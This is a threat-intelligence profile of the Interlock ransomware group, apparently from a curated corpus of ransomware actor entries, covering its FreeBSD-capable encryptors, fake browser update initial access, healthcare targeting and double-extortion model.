Interlock Ransomware (Cisco Talos canonical disclosure, November 2024) is a financially-motivated cybercriminal ransomware operation that emerged in approximately September- October 2024 and has demonstrated operationally-distinctive tradecraft in three significant dimensions: (1) CROSS-PLATFORM RANSOMWARE ENCRYPTOR DEVELOPMENT INCLUDING FREEBSD TARGETING. Interlock operators have developed and deployed ransomware encryptor variants for Windows, Linux, AND FreeBSD operating systems, operationally distinctive in the ransomware ecosystem for the FreeBSD targeting capability. FreeBSD is a Unix-like operating system used in selective server and appliance environments (network appliances, security infrastructure including firewalls and IDS, selective web-serving environments) but rarely targeted by ransomware operators, leaving FreeBSD systems as relative- safe-haven platforms in mixed-environment ransomware incidents. Interlock's FreeBSD targeting capability removes this safe-haven assumption for affected victim organizations and represents a tooling-investment level beyond the commodity ransomware ecosystem norm. (2) CLEARFAKE-STYLE FAKE BROWSER UPDATE INITIAL ACCESS TRADECRAFT. Interlock operators rely on ClearFake-style fake browser update social-engineering lures for initial access, operating by compromising legitimate websites (often via JavaScript injection in WordPress or other CMS-managed sites), serving visitors fake browser update overlays claiming Chrome or Microsoft Edge requires a security update, and delivering initial Interlock payloads via fake update installers. The signature initial-access tradecraft operationally distinguishes Interlock from compromised- credential-driven ransomware clusters (Fog Ransomware, fog_ransomware.yaml) and from N-day-exploitation-driven clusters, positioning Interlock within the broader fake- browser-update social-engineering ecosystem that has emerged as a significant ransomware delivery pathway in 2023-2025. (3) HEALTHCARE SECTOR TARGETING WITH PATIENT-SAFETY IMPLICATIONS. Interlock operators have demonstrated a significant targeting focus on healthcare sector victims, including the high-profile attack on DaVita Inc. (one of the largest US dialysis providers). Healthcare sector targeting creates significant patient safety implications: ransomware operations against healthcare providers including dialysis providers and hospitals can disrupt critical patient care services and create direct patient-safety risk in addition to the data-breach and financial impacts. The HHS Health Sector Cybersecurity Coordination Center (HC3) has issued multiple advisories on Interlock Ransomware threat indicators for healthcare sector defenders. Cisco Talos has assessed possible operational linkage between Interlock operators and the Rhysida ransomware ecosystem (rhysida_ransomware.yaml) based on observed tooling overlaps and operational tradecraft similarities, though the operational-linkage assessment is analytical and not confirmed. The cluster operates with the standard double-extortion ransomware operational model: data exfiltration to Mega.nz cloud storage via rclone, encryption of victim systems with cross-platform encryptors, and ransom demands leveraged by both encryption impact and threatened data publication on the cluster-controlled WorldLeaks dark- web leak site. Interlock Ransomware is curated alongside the broader ransomware ecosystem coverage in this corpus (LockBit, lockbit_operators.yaml.
Akira, akira_ransomware.yaml.
Play, play_ransomware.yaml.
Black Basta, black_basta.yaml.
Royal / BlackSuit, royal_blacksuit.yaml.
Cactus, cactus_ransomware.yaml; Rhysida, rhysida_ransomware.yaml.
INC Ransom, inc_ransom.yaml; Medusa, medusa_ransomware.yaml.
Qilin, qilin_ransomware.yaml; Hunters International, hunters_international.yaml.
BianLian, bianlian.yaml.
RansomHub, ransomhub.yaml.
Fog, fog_ransomware.yaml; DragonForce, dragonforce.yaml.
Embargo, embargo_ransomware.yaml; NoEscape, noescape.yaml.
Trigona, trigona_ransomware.yaml.
Hive, hive_ransomware.yaml.
REvil, revil_sodinokibi.yaml.
DarkSide / BlackMatter, darkside_blackmatter.yaml.
ALPHV / BlackCat, alphv_blackcat.yaml.
Maze, maze_ransomware.yaml.
Conti / Wizard Spider, wizard_spider_conti.yaml.
Cuba, cuba_ransomware.yaml; Vice Society / Vanilla Tempest, vice_society_vanilla_tempest.yaml). Its operational distinctiveness within this ecosystem is the cross-platform-including-FreeBSD encryptor capability and the ClearFake-style fake-browser-update initial-access tradecraft.